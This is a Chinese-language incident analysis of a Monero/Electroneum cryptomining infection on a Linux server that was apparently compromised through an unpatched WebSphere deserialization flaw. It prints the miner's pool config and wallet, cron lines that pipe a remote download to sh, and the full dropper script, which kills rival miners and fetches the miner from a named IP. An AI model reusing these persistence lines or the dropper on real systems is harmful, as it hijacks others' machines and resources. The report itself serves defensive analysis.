Linux系统爆出ETN挖矿病毒

一、环境

最近，顾客向华屹安全性精英团队通告其网络服务器运作出现异常。通过安全性专业技术人员的查验，发现了这也是一例典型性的利用Linux网络服务器系统漏洞执行XMR挖币的安全事故。现阶段网络安全问题中网络黑客利用安全漏洞执行挖币的事情频见报导，而本精英团队在现实工作上却头回遇上，因而对该样版执行了深入分析。

二、技术性深入分析

1、服务器自然环境为Linux

2、发现一出现异常过程，其运作状况为：

./kswapd0 -c ksvjptcyah.cf -t 2

联接的端口号是148.251.133.246的80。

利用IP查询，发现其是国外的网络服务器。实际如下图所示：

立即用电脑浏览器浏览，其回到的是mining server online，如下图所示，不难看出该网络服务器应该是一台挖矿软件网络服务器。

还发现，该服务器还对外开放5555端口号(回到和80端口号一致)、8080端口。用电脑浏览器立即浏览8080端口号，发现其是electroneum挖矿软件。其首页回到如下图所示：

3、发现过程kswapd0坐落于/var/tmp文件目录下，该目录下与此同时还储放ksvjptcyah.cf文档。在其中ksvjptcyah.cf文档的主要内容如下所示所显示：

ksvjptcyah.cf具体内容

{

"url" : "stratum tcp://148.251.133.246:80",

"user" :"etnkN7n6nSXjPNxVjFFqjaCHdaXBHR2q3cWUnd5ZEtnvAVKKYRrucRgF34XdY2cMfAEUsTrUFJNGvgK4q2dQFfsY41pihj9PMc",

"pass" : "x",

"algo" : "cryptonight",

"quiet" : true

}

显而易见，这也是挖币程序流程的环境变量。

在其中挖矿软件详细地址为：148.251.133.246:80

挖币账号为：etnkN7n6nSXjPNxVjFFqjaCHdaXBHR2q3cWUnd5ZEtnvAVKKYRrucRgF34XdY2cMfAEUsTrUFJNGvgK4q2dQFfsY41pihj9PMc

Quiet表明在后台管理清静的挖币。

在该矿池的页面，根据检索发现该账号挖币的详细情况如下图所示：

如上图所述所显示，挖的是ETN币。每秒钟的hash rate为159.45KH。表明该病毒感染最少感染了不计其数台了(假如假定一台服务器60-1000H/S的状况)。

4、利用kill杀死kswapd0过程。

过一会发现，又出去同样出现异常过程，进程会转变，

./ Ksvjptcyah -c Ksvjptcyah .cf -t 2。

5、搜索其运行方法，依据过去工作经验，一般病毒感染会利用计划任务运行。

果真，发现运行每日任务如下所示：

*/29 * * * * wget -O - -q/Article/UploadPic/2018-4/2986.jpg|sh

*/30 * * * * curl/Article/UploadPic/2018-4/2986.jpg|sh

利用ip138查看，发现181.214.87.241是一台坐落于国外或是多米尼加的设备。查询记录如下图所示：

对其立即利用电脑浏览器浏览，实际的是apache ubuntu 缺省页面。如下图所示：

电脑浏览器立即浏览/Article/UploadPic/2018-4/2986.jpg，表明该照片因不正确不显示，结论如下图所示：

用curl直接下载回当地，发现其具体内容如下所示：

oracle.jpg的具体内容：

id1="adcixstgtf"

id2="ksvjptcyah"

id3="kswapd0"

rm -rf /var/tmp/vmstat

rm -rf /var/tmp/`echo $id1`.conf

ps auxf|grep -v grep|grep -v `echo$id2`|grep "/tmp/"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "\-px"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep"stratum"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep"cryptonight"|awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep `echo$id1`|awk '{print $2}'|xargs kill -9

ps -fe|grep `echo $id2`|grep -v grep

if [ $? -ne 0 ]

then

echo "start process....."

chmod 777 /var/tmp/`echo $id2`.cf

rm -rf /var/tmp/`echo $id2`.cf

curl -o /var/tmp/`echo $id2`.cfhttp://181.214.87.241/java/`echo $id3`.cf

wget -O /var/tmp/`echo $id2`.cfhttp://181.214.87.241/java/`echo $id3`.cf

chmod 777 /var/tmp/`echo $id3`

rm -rf /var/tmp/`echo $id3`

cat /proc/cpuinfo|grep aes>/dev/null

if [ $? -ne 1 ]

then

curl -o /var/tmp/`echo $id3`http://181.214.87.241/java/`echo $id3`

wget -O /var/tmp/`echo $id3`http://181.214.87.241/java/`echo $id3`

else

curl -o /var/tmp/`echo $id3`http://181.214.87.241/java/`echo $id3`_an

wget -O /var/tmp/`echo $id3`http://181.214.87.241/java/`echo $id3`_an

fi

chmod x /var/tmp/`echo $id3`

cd /var/tmp

proc=`grep -c ^processor /proc/cpuinfo`

cores=$((($proc 1)/2))

./`echo $id3` -c `echo $id2`.cf -t `echo$cores` >/dev/null &

else

echo "Running....."

fi

根据研究该sh脚本，发现该程序流程最先剖析当地设备是不是已经存有别的的挖矿软件，假如存有就先杀死。(在我发财路者格杀勿论…)

随后从181.214.87.241服务器下载环境变量和挖币程序流程。

网络黑客还分辨其cpu 状况，cores=$((($proc 1)/2))表明网络黑客只利用了服务器一半多的CPU网络资源用以挖币，给设备主人家留有一点可以用的网络资源(粗心大意的设备主人家并没有反映…，你好我也好…)。

6、网络服务器怎样被感染的?

安全性专业技术人员根据对该网站服务器的再度剖析，发现其websphere手机软件并没有补丁包，网络黑客是利用此软件的java 反编码序列系统漏洞立即操纵本网络服务器。